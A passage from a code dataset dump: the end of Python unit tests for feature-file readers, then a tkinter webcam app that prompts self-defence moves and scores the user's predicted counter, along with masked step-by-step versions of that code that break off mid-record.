self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFEEmptyFile2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = 'Header\\n---- column1: 0.1738919473844908\\n---- column2: 0.1738919473844908\\n---- column3: 0.1738919473844908\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testDTFull2(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1: 0.1738919473844908\\n---- column2: 0.1738919473844908\\n---- column3: 0.1738919473844908\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testDTFull3(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1: 0.1738919473844908\\n---- column2: 0.1738919473844908\\n---- column3: 0.1738919473844908\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(context.exception))\n\n def testDTEmpty(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTEmpty2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFENotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testRFENotExist2(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n\n\nif __name__ == '__main__':\n unittest.main", "step-ids": [ 14, 16, 17, 18, 19 ] }
[ 14, 16, 17, 18, 19 ]
#THIS IS PYTHON3 import tkinter as tk from tkinter import * from PIL import ImageTk from PIL import Image #to handle non-gif image formats import cv2 import numpy as np from statistics import mode import time import random import predict as ml def calcSuccess(predictedCounter, randAssault): vidLabel.pack_forget() if predictedCounter == "parry_R": instructionLabel.config(text="RIGHT PARRY") if randAssault == 4 or randAssault == 2: descriptionLabel.config(text="You've successfully parried!") elif randAssault == 3: descriptionLabel.config(text="You've been cut!") elif randAssault == 5: descriptionLabel.config(text="You've been hit!") else: descriptionLabel.config(text="You've been grabbed!") if predictedCounter == "parry_L": instructionLabel.config(text="LEFT PARRY") if randAssault == 5 or randAssault == 3: descriptionLabel.config(text="You've successfully parried!") elif randAssault == 2: descriptionLabel.config(text="You've been cut!") elif randAssault == 4: descriptionLabel.config(text="You've been hit!") else: descriptionLabel.config(text="You've been grabbed!") if predictedCounter == "punch_R": instructionLabel.config(text="RIGHT PUNCH") if randAssault == 0 or randAssault == 1 or randAssault == 4: descriptionLabel.config(text="You've successfully counter attacked!") elif randAssault == 2 or randAssault == 3: descriptionLabel.config(text="You've been cut!") elif randAssault == 5: descriptionLabel.config(text="You've been hit!") if predictedCounter == "punch_L": instructionLabel.config(text="LEFT PUNCH") if randAssault == 0 or randAssault == 1 or randAssault == 5: descriptionLabel.config(text="You've successfully counter attacked!") elif randAssault == 2 or randAssault == 3: descriptionLabel.config(text="You've been cut!") elif randAssault == 4: descriptionLabel.config(text="You've been hit!") if predictedCounter == "weave_R": instructionLabel.config(text="RIGHT WEAVE") if randAssault == 1 or randAssault == 3 or randAssault == 5: descriptionLabel.config(text="You've successfully evaded!") elif randAssault == 4: descriptionLabel.config(text="You've been hit!") elif randAssault == 2: descriptionLabel.config(text="You've been cut!") else: descriptionLabel.config(text="You've been grabbed!") if predictedCounter == "weave_L": instructionLabel.config(text="LEFT WEAVE") if randAssault == 0 or randAssault == 2 or randAssault == 4: descriptionLabel.config(text="You've successfully evaded!") elif randAssault == 5: descriptionLabel.config(text="You've been hit!") elif randAssault == 3: descriptionLabel.config(text="You've been cut!") else: descriptionLabel.config(text="You've been grabbed!") if predictedCounter == "block": instructionLabel.config(text="BLOCK") if randAssault == 5 or randAssault == 4: descriptionLabel.config(text="You've successfully blocked!") elif randAssault == 2 or randAssault == 3: descriptionLabel.config(text="You've been cut!") elif randAssault == 0 or randAssault == 1: descriptionLabel.config(text="You've been grabbed!") descriptionLabel.pack() cap = cv2.VideoCapture(0) root = tk.Tk() #initialize tkinter by making tk rook widget--consists of window with tile bar and decoration provided by window manager. Root widget must be made first and can only be one. root.geometry("2000x1100") ldFrame = Frame(root).pack(side="top") #frame to hold logo and description canvas = Canvas(ldFrame, width=700, height=200) canvas.pack(side="top") #open image with pil image because PhotoImage only takes gif pilLogo = Image.open("Logo.png") logo = ImageTk.PhotoImage(pilLogo) #makes PhotoImage from pil image canvas.create_image(350, 100, image=logo) #adds PhotoImage to Canvas #make basic description label from text string on the logo description frame descriptionText = """This program trains the user to respond in self defense to common physical threats.""" descriptionLabel = tk.Label(ldFrame, justify="center", padx=10, font=("Courier", 18), wraplength=1900, text=descriptionText) descriptionLabel.pack(side="top") #make center frame that will show instructions initially and then have "assaulter" prompts and live video centerFrame = Frame(root).pack() countdownLabel = tk.Label(centerFrame, justify="center", font=("Courier", 20), text="") #invisible for now because not packed instructionText = """In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.""" instructionLabel = tk.Label(centerFrame, justify="center", padx=50, pady=50, font=("Courier", 16), wraplength=1800, text=instructionText) instructionLabel.pack(side="top") #setup to capture video frames vidLabel = Label(root) def show_frame(milliseconds): if milliseconds > 0: #global predictionArr _, frame = cap.read() #predictionArr.append(predict.get_prediction(frame, "ace-connection-236822", "ICN2459521650166688930")) frame = cv2.flip(frame, 1) #horizontally flips images so is like reflection cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) #makes normal color img = Image.fromarray(cv2image) imgtk = ImageTk.PhotoImage(img) vidLabel.imgtk = imgtk vidLabel.config(image=imgtk) root.update() root.after(30, show_frame, (milliseconds-30)) _, frame = cap.read() cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) img = Image.fromarray(cv2image) img = img.convert("RGB") img.save("imgFile.jpeg") if milliseconds == secondsChosen*3000: return ml.predict("imgFile.jpeg") #make bottom frame that hold buttons buttonFrame = Frame(root) buttonFrame.pack(side="bottom") difficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=("Courier", 16)) difficultyList.insert(1, "Easy: 6 seconds") difficultyList.insert(2, "Medium: 3 seconds") difficultyList.insert(3, "Hard: 1 seconds") difficultyList.pack(side="top") cycling = True def runPrompt(): startButton.config(text="Next") startButton.pack(side=LEFT) resetButton.pack(side=RIGHT) descriptionLabel.pack_forget() assaultList = ["Grab from your right", "Grab from your left", "Blade attack from the right", "Blade attack from the left", "Hit from the right", "Hit from the left"] counterList = ["parry_R", "parry_L", "weave_R", "weave_L", "punch_R", "punch_L", "block"] difficultyChoice = (difficultyList.get(ACTIVE)) global secondsChosen secondsChosen = 0 if difficultyChoice[0] == "E": secondsChosen = 6 elif difficultyChoice[0] == "M": secondsChosen = 3 else: secondsChosen = 1 print(secondsChosen) difficultyList.pack_forget() randAssault = random.randint(0, 5) instructionLabel.config(text=assaultList[randAssault], font=("Courier", 25)) vidLabel.pack() predictedCounter = show_frame(secondsChosen*1000) if predictedCounter not in counterList: predictedCounter = counterList[random.randint(0, 6)] root.after(secondsChosen*1200, calcSuccess, predictedCounter, randAssault) return 0 def reset(): resetButton.pack_forget() startButton.config(text="Start") startButton.pack(side=BOTTOM) instructionLabel.config(text=instructionText, font=("Courier", 16)) descriptionLabel.config(text=descriptionText, font=("Courier", 18)) descriptionLabel.pack(side=TOP) difficultyList.pack(side=TOP) startButton = Button(buttonFrame, bd=6, padx=20, pady=20,font=("Courier", 16), text="Start", fg="green", command=runPrompt) startButton.pack(side=BOTTOM) resetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=("Courier", 16), text="Reset", fg="red", command=reset) root.mainloop() cap.release()
normal
{ "blob_id": "8cf6a9243182a4f6b68199a8967e06790396dc10", "index": 5967, "step-1": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\n<mask token>\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\n<mask token>\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\n<mask token>\nroot.geometry('2000x1100')\n<mask token>\ncanvas.pack(side='top')\n<mask token>\ncanvas.create_image(350, 100, image=logo)\n<mask token>\ndescriptionLabel.pack(side='top')\n<mask token>\ninstructionLabel.pack(side='top')\n<mask token>\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\n<mask token>\nbuttonFrame.pack(side='bottom')\n<mask token>\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\n<mask token>\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\n<mask token>\nstartButton.pack(side=BOTTOM)\n<mask token>\nroot.mainloop()\ncap.release()\n", "step-3": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\nroot = tk.Tk()\nroot.geometry('2000x1100')\nldFrame = Frame(root).pack(side='top')\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side='top')\npilLogo = Image.open('Logo.png')\nlogo = ImageTk.PhotoImage(pilLogo)\ncanvas.create_image(350, 100, image=logo)\ndescriptionText = (\n 'This program trains the user to respond in self defense to common physical threats.'\n )\ndescriptionLabel = tk.Label(ldFrame, justify='center', padx=10, font=(\n 'Courier', 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side='top')\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify='center', font=('Courier', \n 20), text='')\ninstructionText = (\n 'In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.'\n )\ninstructionLabel = tk.Label(centerFrame, justify='center', padx=50, pady=50,\n font=('Courier', 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side='top')\nvidLabel = Label(root)\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side='bottom')\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\n 'Courier', 16))\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\ncycling = True\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Start', fg='green', command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Reset', fg='red', command=reset)\nroot.mainloop()\ncap.release()\n", "step-4": "import tkinter as tk\nfrom tkinter import *\nfrom PIL import ImageTk\nfrom PIL import Image\nimport cv2\nimport numpy as np\nfrom statistics import mode\nimport time\nimport random\nimport predict as ml\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\nroot = tk.Tk()\nroot.geometry('2000x1100')\nldFrame = Frame(root).pack(side='top')\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side='top')\npilLogo = Image.open('Logo.png')\nlogo = ImageTk.PhotoImage(pilLogo)\ncanvas.create_image(350, 100, image=logo)\ndescriptionText = (\n 'This program trains the user to respond in self defense to common physical threats.'\n )\ndescriptionLabel = tk.Label(ldFrame, justify='center', 